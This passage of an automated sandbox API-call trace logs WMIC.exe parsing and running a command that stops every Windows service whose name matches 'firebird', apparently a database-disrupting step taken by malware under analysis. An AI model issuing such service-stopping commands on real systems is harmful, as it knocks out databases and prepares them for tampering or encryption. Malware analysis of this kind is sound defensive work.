[0249.576] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.576] SysStringLen (param_1="wmiclimofformat") returned 0xf [0249.576] malloc (_Size=0x30) returned 0x358500 [0249.576] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.576] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.576] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.576] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=19, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.576] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="textvaluelist.xsl") returned 0x0 [0249.576] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.576] malloc (_Size=0x18) returned 0x35ca20 [0249.576] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.576] free (_Block=0x35ca20) [0249.576] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0249.576] malloc (_Size=0x18) returned 0x35ca20 [0249.576] malloc (_Size=0x18) returned 0x35ca40 [0249.577] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0249.577] SysStringLen (param_1="TABLE") returned 0x5 [0249.577] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0249.577] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.577] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0249.577] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.577] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0249.577] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.577] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.577] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0249.577] malloc (_Size=0x30) returned 0x358540 [0249.577] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.577] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.577] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.577] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=20, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.577] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="textvaluelist.xsl") returned 0x0 [0249.577] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.577] malloc (_Size=0x18) returned 0x35ca60 [0249.577] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.577] free (_Block=0x35ca60) [0249.578] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0249.578] malloc (_Size=0x18) returned 0x35ca60 [0249.578] malloc (_Size=0x18) returned 0x35ca80 [0249.578] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0249.578] SysStringLen (param_1="TABLE") returned 0x5 [0249.578] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0249.578] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.578] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0249.578] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.578] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0249.578] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.578] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0249.578] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0249.578] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.578] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0249.578] malloc (_Size=0x30) returned 0x358580 [0249.578] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.578] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.578] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.578] IUnknown:Release (This=0x23b9cc0) returned 0x0 [0249.578] FreeThreadedDOMDocument:IUnknown:Release (This=0x23bbc50) returned 0x1 [0249.578] FreeThreadedDOMDocument:IUnknown:Release (This=0x23b71d0) returned 0x0 [0249.579] free (_Block=0x356f30) [0249.579] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice" [0249.579] malloc (_Size=0xe0) returned 0x356ef0 [0249.579] memcpy_s (in: _Destination=0x356ef0, _DestinationSize=0xde, _Source=0x825ee, _SourceSize=0xd2 | out: _Destination=0x356ef0) returned 0x0 [0249.579] malloc (_Size=0x18) returned 0x35caa0 [0249.579] malloc (_Size=0x18) returned 0x35cac0 [0249.579] malloc (_Size=0x18) returned 0x35cae0 [0249.579] malloc (_Size=0x18) returned 0x35cb00 [0249.579] malloc (_Size=0x80) returned 0x35cd30 [0249.579] GetLocalTime (in: lpSystemTime=0x28f9d0 | out: lpSystemTime=0x28f9d0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x8, wMilliseconds=0x174)) [0249.579] _vsnwprintf (in: _Buffer=0x35cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x28f928 | out: _Buffer="04-28-2020T20:42:08") returned 19 [0249.579] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.579] malloc (_Size=0x8e) returned 0x35cdc0 [0249.579] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] malloc (_Size=0x8e) returned 0x35ce60 [0249.580] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] malloc (_Size=0xa) returned 0x35cb20 [0249.580] lstrlenW (lpString="path") returned 4 [0249.580] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0249.580] malloc (_Size=0xa) returned 0x35cb40 [0249.580] malloc (_Size=0x8) returned 0x357140 [0249.580] free (_Block=0x0) [0249.580] free (_Block=0x35cb20) [0249.580] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] malloc (_Size=0x1c) returned 0x35cf00 [0249.580] lstrlenW (lpString="Win32_Service") returned 13 [0249.580] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0249.580] malloc (_Size=0x1c) returned 0x35cf30 [0249.580] malloc (_Size=0x10) returned 0x35cb20 [0249.580] memmove_s (in: _Destination=0x35cb20, _DestinationSize=0x8, _Source=0x357140, _SourceSize=0x8 | out: _Destination=0x35cb20) returned 0x0 [0249.580] free (_Block=0x357140) [0249.580] free (_Block=0x0) [0249.580] free (_Block=0x35cf00) [0249.580] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.580] malloc (_Size=0xc) returned 0x35cb60 [0249.580] lstrlenW (lpString="where") returned 5 [0249.581] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0249.581] malloc (_Size=0xc) returned 0x35cb80 [0249.581] malloc (_Size=0x18) returned 0x35cba0 [0249.581] memmove_s (in: _Destination=0x35cba0, _DestinationSize=0x10, _Source=0x35cb20, _SourceSize=0x10 | out: _Destination=0x35cba0) returned 0x0 [0249.581] free (_Block=0x35cb20) [0249.581] free (_Block=0x0) [0249.581] free (_Block=0x35cb60) [0249.581] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.581] malloc (_Size=0x36) returned 0x3585c0 [0249.581] lstrlenW (lpString="\"name like '%%firebird%%'\"") returned 26 [0249.581] _wcsicmp (_String1="\"name like '%%firebird%%'\"", _String2="\"NULL\"") returned -20 [0249.581] lstrlenW (lpString="\"name like '%%firebird%%'\"") returned 26 [0249.581] lstrlenW (lpString="\"name like '%%firebird%%'\"") returned 26 [0249.581] malloc (_Size=0x36) returned 0x358600 [0249.581] malloc (_Size=0x20) returned 0x35cf00 [0249.581] memmove_s (in: _Destination=0x35cf00, _DestinationSize=0x18, _Source=0x35cba0, _SourceSize=0x18 | out: _Destination=0x35cf00) returned 0x0 [0249.581] free (_Block=0x35cba0) [0249.581] free (_Block=0x0) [0249.581] free (_Block=0x3585c0) [0249.581] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.581] malloc (_Size=0xa) returned 0x35cba0 [0249.581] lstrlenW (lpString="call") returned 4 [0249.581] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0249.581] malloc (_Size=0xa) returned 0x35cb60 [0249.581] malloc (_Size=0x30) returned 0x3585c0 [0249.581] memmove_s (in: _Destination=0x3585c0, _DestinationSize=0x20, _Source=0x35cf00, _SourceSize=0x20 | out: _Destination=0x3585c0) returned 0x0 [0249.581] free (_Block=0x35cf00) [0249.582] free (_Block=0x0) [0249.582] free (_Block=0x35cba0) [0249.582] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 70 [0249.582] malloc (_Size=0x18) returned 0x35cba0 [0249.582] lstrlenW (lpString="stopservice") returned 11 [0249.582] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0249.582] malloc (_Size=0x18) returned 0x35cb20 [0249.582] free (_Block=0x0) [0249.582] free (_Block=0x35cba0) [0249.582] malloc (_Size=0x30) returned 0x358640 [0249.582] lstrlenW (lpString="QUIT") returned 4 [0249.582] lstrlenW (lpString="path") returned 4 [0249.582] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0249.582] lstrlenW (lpString="EXIT") returned 4 [0249.582] lstrlenW (lpString="path") returned 4 [0249.582] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0249.582] free (_Block=0x358640) [0249.582] WbemLocator:IUnknown:AddRef (This=0x1ea1390) returned 0x2 [0249.582] malloc (_Size=0x30) returned 0x358640 [0249.582] lstrlenW (lpString="/") returned 1 [0249.582] lstrlenW (lpString="path") returned 4 [0249.582] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0249.582] lstrlenW (lpString="-") returned 1 [0249.582] lstrlenW (lpString="path") returned 4 [0249.582] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0249.583] lstrlenW (lpString="CLASS") returned 5 [0249.583] lstrlenW (lpString="path") returned 4 [0249.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0249.583] lstrlenW (lpString="PATH") returned 4 [0249.583] lstrlenW (lpString="path") returned 4 [0249.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0249.583] lstrlenW (lpString="/") returned 1 [0249.583] lstrlenW (lpString="Win32_Service") returned 13 [0249.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0249.583] lstrlenW (lpString="-") returned 1 [0249.583] lstrlenW (lpString="Win32_Service") returned 13 [0249.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0249.583] lstrlenW (lpString="Win32_Service") returned 13 [0249.583] malloc (_Size=0x1c) returned 0x35cf00 [0249.583] lstrlenW (lpString="Win32_Service") returned 13 [0249.583] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0249.583] lstrlenW (lpString="Win32_Service") returned 13 [0249.583] malloc (_Size=0x1c) returned 0x357140 [0249.583] lstrlenW (lpString="Win32_Service") returned 13 [0249.583] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xfffffffffff366f0 | out: _String=0x0, _Context=0xfffffffffff366f0) returned 0x0 [0249.583] lstrlenW (lpString="") returned 0 [0249.584] lstrlenW (lpString="WHERE") returned 5 [0249.584] lstrlenW (lpString="where") returned 5 [0249.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0249.584] lstrlenW (lpString="/") returned 1 [0249.584] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0249.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%firebird%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0249.584] lstrlenW (lpString="-") returned 1 [0249.584] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0249.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%firebird%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0249.584] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0249.584] malloc (_Size=0x32) returned 0x358680 [0249.584] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0249.584] lstrlenW (lpString="/") returned 1 [0249.584] lstrlenW (lpString="call") returned 4 [0249.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0249.584] lstrlenW (lpString="-") returned 1 [0249.584] lstrlenW (lpString="call") returned 4 [0249.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0249.584] lstrlenW (lpString="call") returned 4 [0249.584] malloc (_Size=0xa) returned 0x35cba0 [0249.584] lstrlenW (lpString="call") returned 4 [0249.584] lstrlenW (lpString="GET") returned 3 [0249.584] lstrlenW (lpString="call") returned 4 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0249.585] lstrlenW (lpString="LIST") returned 4 [0249.585] lstrlenW (lpString="call") returned 4 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0249.585] lstrlenW (lpString="SET") returned 3 [0249.585] lstrlenW (lpString="call") returned 4 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0249.585] lstrlenW (lpString="CREATE") returned 6 [0249.585] lstrlenW (lpString="call") returned 4 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0249.585] lstrlenW (lpString="CALL") returned 4 [0249.585] lstrlenW (lpString="call") returned 4 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0249.585] lstrlenW (lpString="/") returned 1 [0249.585] lstrlenW (lpString="stopservice") returned 11 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0249.585] lstrlenW (lpString="-") returned 1 [0249.585] lstrlenW (lpString="stopservice") returned 11 [0249.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0249.585] lstrlenW (lpString="stopservice") returned 11 [0249.585] malloc (_Size=0x18) returned 0x35cbc0 [0249.585] lstrlenW (lpString="stopservice") returned 11 [0249.585] ??0CHString@@QEAA@XZ () returned 0x28d578 [0249.585] GetCurrentThreadId () returned 0x2ac [0249.586] GetCurrentThreadId () returned 0x2ac [0249.586] ??0CHString@@QEAA@XZ () returned 0x28d348 [0249.586] malloc (_Size=0x8) returned 0x35cf60 [0249.586] malloc (_Size=0x18) returned 0x35cbe0 [0249.586] malloc (_Size=0x18) returned 0x35cc00 [0249.586] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ea1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffdb2950 | out: ppNamespace=0xffdb2950*=0x1eb3a98) returned 0x0 [0249.629] free (_Block=0x35cc00) [0249.629] CoSetProxyBlanket (pProxy=0x1eb3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0249.629] free (_Block=0x35cf60) [0249.629] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.629] free (_Block=0x35cbe0) [0249.629] malloc (_Size=0x18) returned 0x35cbe0 [0249.629] IWbemServices:GetObject (in: This=0x1eb3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x28d558*=0x0, ppCallResult=0x0 | out: ppObject=0x28d558*=0x1edbfa0, ppCallResult=0x0) returned 0x0 [0249.655] free (_Block=0x35cbe0) [0249.655] IWbemClassObject:BeginMethodEnumeration (This=0x1edbfa0, lEnumFlags=0) returned 0x0 [0249.655] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="StartService", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc4a0) returned 0x0 [0249.656] lstrlenW (lpString="StartService") returned 12 [0249.656] lstrlenW (lpString="stopservice") returned 11 [0249.656] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0249.656] IUnknown:Release (This=0x1edc4a0) returned 0x0 [0249.656] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="StopService", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc4a0) returned 0x0 [0249.656] lstrlenW (lpString="StopService") returned 11 [0249.656] lstrlenW (lpString="stopservice") returned 11 [0249.656] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0249.656] malloc (_Size=0x70) returned 0x35cf60 [0249.656] ??0CHString@@QEAA@XZ () returned 0x28cf08 [0249.656] GetCurrentThreadId () returned 0x2ac [0249.657] IWbemClassObject:GetNames (in: This=0x1edc4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x28cf00 | out: pNames=0x28cf00*="\x01ƀ\x08") returned 0x0 [0249.657] SafeArrayGetLBound (in: psa=0x124af0, nDim=0x1, plLbound=0x28cf18 | out: plLbound=0x28cf18) returned 0x0 [0249.657] SafeArrayGetUBound (in: psa=0x124af0, nDim=0x1, plUbound=0x28cf14 | out: plUbound=0x28cf14) returned 0x0 [0249.657] SafeArrayGetElement (in: psa=0x124af0, rgIndices=0x28cef4, pv=0x28cef8 | out: pv=0x28cef8) returned 0x0 [0249.657] malloc (_Size=0x48) returned 0x35cfe0 [0249.657] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1edc4a0, wszProperty="ReturnValue", ppQualSet=0x28cd48 | out: ppQualSet=0x28cd48*=0x1ea13b0) returned 0x0 [0249.657] malloc (_Size=0x18) returned 0x35cbe0 [0249.657] IWbemQualifierSet:Get (in: This=0x1ea13b0, wszName="CIMTYPE", lFlags=0, pVal=0x28cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x28cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0249.658] free (_Block=0x35cbe0) [0249.658] malloc (_Size=0x18) returned 0x35cbe0 [0249.658] IWbemClassObject:Get (in: This=0x1edc4a0, wszName="ReturnValue", lFlags=0, pVal=0x28ce78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x28cd58*=2674080, plFlavor=0x0 | out: pVal=0x28ce78*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x28cd58*=19, plFlavor=0x0) returned 0x0 [0249.658] malloc (_Size=0x18) returned 0x35cc00 [0249.658] IWbemQualifierSet:Get (in: This=0x1ea13b0, wszName="read", lFlags=0, pVal=0x28cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffdb2ac0), plFlavor=0x0 | out: pVal=0x28cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffdb2ac0), plFlavor=0x0) returned 0x80041002 [0249.658] free (_Block=0x35cc00) [0249.658] malloc (_Size=0x18) returned 0x35cc00 [0249.658] IWbemQualifierSet:Get (in: This=0x1ea13b0, wszName="write", lFlags=0, pVal=0x28cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffdb2ac0), plFlavor=0x0 | out: pVal=0x28cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffdb2ac0), plFlavor=0x0) returned 0x80041002 [0249.658] free (_Block=0x35cc00) [0249.658] malloc (_Size=0x18) returned 0x35cc00 [0249.658] malloc (_Size=0x18) returned 0x35cc20 [0249.658] IWbemQualifierSet:Get (in: This=0x1ea13b0, wszName="Description", lFlags=0, pVal=0x28ce10*(varType=0x0, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0xffd54293, varVal2=0x28ce18), plFlavor=0x0 | out: pVal=0x28ce10*(varType=0x0, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0xffd54293, varVal2=0x28ce18), plFlavor=0x0) returned 0x80041002 [0249.658] free (_Block=0x35cc20) [0249.659] malloc (_Size=0x18) returned 0x35cc20 [0249.659] lstrlenA (lpString="Not Available") returned 13 [0249.659] malloc (_Size=0x1c) returned 0x35d030 [0249.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffd422f0, cbMultiByte=-1, lpWideCharStr=0x35d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0249.659] free (_Block=0x35d030) [0249.659] IUnknown:Release (This=0x1ea13b0) returned 0x0 [0249.659] malloc (_Size=0x48) returned 0x35d030 [0249.659] malloc (_Size=0x18) returned 0x35cc40 [0249.659] malloc (_Size=0x48) returned 0x35d080 [0249.659] malloc (_Size=0x70) returned 0x35d0d0 [0249.659] malloc (_Size=0x48) returned 0x35d150 [0249.659] free (_Block=0x35d080) [0249.659] free (_Block=0x35d030) [0249.659] free (_Block=0x35cfe0) [0249.659] free (_Block=0x35cc00) [0249.659] free (_Block=0x35cc20) [0249.659] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.660] IWbemClassObject:GetMethodQualifierSet (in: This=0x1edbfa0, wszMethod="StopService", ppQualSet=0x28d478 | out: ppQualSet=0x28d478*=0x1ea13b0) returned 0x0 [0249.660] malloc (_Size=0x18) returned 0x35cc20 [0249.660] IWbemQualifierSet:Get (in: This=0x1ea13b0, wszName="Implemented", lFlags=0, pVal=0x28d488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d413134a939, varVal2=0xffd544fb), plFlavor=0x0 | out: pVal=0x28d488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d413134a939, varVal2=0xffd544fb), plFlavor=0x0) returned 0x80041002 [0249.660] free (_Block=0x35cc20) [0249.660] malloc (_Size=0x18) returned 0x35cc20 [0249.660] malloc (_Size=0x18) returned 0x35cc00 [0249.660] IWbemQualifierSet:Get (in: This=0x1ea13b0, wszName="Description", lFlags=0, pVal=0x28d4a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffdb2948, varVal2=0x2ac), plFlavor=0x0 | out: pVal=0x28d4a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x2ac), plFlavor=0x0) returned 0x0 [0249.660] free (_Block=0x35cc00) [0249.660] malloc (_Size=0x18) returned 0x35cc00 [0249.660] IUnknown:Release (This=0x1ea13b0) returned 0x0 [0249.660] malloc (_Size=0x70) returned 0x35cfe0 [0249.660] malloc (_Size=0x70) returned 0x35d1a0 [0249.660] malloc (_Size=0x48) returned 0x35d060 [0249.660] malloc (_Size=0x18) returned 0x35cc60 [0249.660] malloc (_Size=0x70) returned 0x35d220 [0249.660] malloc (_Size=0x70) returned 0x35d2a0 [0249.660] malloc (_Size=0x48) returned 0x35d320 [0249.661] malloc (_Size=0x50) returned 0x35d370 [0249.661] malloc (_Size=0x70) returned 0x35d3d0 [0249.661] malloc (_Size=0x70) returned 0x35d450 [0249.661] malloc (_Size=0x48) returned 0x35d4d0 [0249.661] free (_Block=0x35d320) [0249.661] free (_Block=0x35d2a0) [0249.661] free (_Block=0x35d220) [0249.661] free (_Block=0x35d060) [0249.661] free (_Block=0x35d1a0) [0249.661] free (_Block=0x35cfe0) [0249.661] IUnknown:Release (This=0x1edc4a0) returned 0x0 [0249.661] free (_Block=0x35d150) [0249.661] free (_Block=0x35d0d0) [0249.661] free (_Block=0x35cf60) [0249.661] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="PauseService", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc4a0) returned 0x0 [0249.661] lstrlenW (lpString="PauseService") returned 12 [0249.661] lstrlenW (lpString="stopservice") returned 11 [0249.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0249.661] IUnknown:Release (This=0x1edc4a0) returned 0x0 [0249.661] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="ResumeService", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc4a0) returned 0x0 [0249.661] lstrlenW (lpString="ResumeService") returned 13 [0249.661] lstrlenW (lpString="stopservice") returned 11 [0249.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0249.661] IUnknown:Release (This=0x1edc4a0) returned 0x0 [0249.661] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="InterrogateService", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc4a0) returned 0x0 [0249.662] lstrlenW (lpString="InterrogateService") returned 18 [0249.662] lstrlenW 